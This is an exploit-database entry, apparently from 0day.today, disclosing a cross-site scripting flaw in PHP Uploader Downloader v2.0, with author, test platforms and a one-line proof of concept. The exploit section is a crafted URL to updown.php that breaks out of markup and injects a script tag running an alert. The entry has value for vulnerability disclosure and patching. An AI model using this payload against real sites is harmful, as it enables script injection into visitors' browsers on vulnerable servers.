PHP Uploader Downloader v2.0 Cross Site Scripting Vulnerability

2009-12-26T00:00:00
ID 1337DAY-ID-10400
Type zdt
Reporter indoushka
Modified 2009-12-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
PHP Uploader Downloader v2.0 Cross Site Scripting Vulnerability
===============================================================

========================================================================================                 
| # Title    : PHP Uploader Downloader Cross Site Scripting Vulnerability              |
| # Author   : indoushka                                                               |
| # Script   : Powered by PHP Uploader Downloader Version 2.0 (http://www.zachwhite.com|
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1-http://server/script_3163/updown.php/>'><ScRiPt>alert(213771818860)</ScRiPt>



#  0day.today [2018-03-02]  #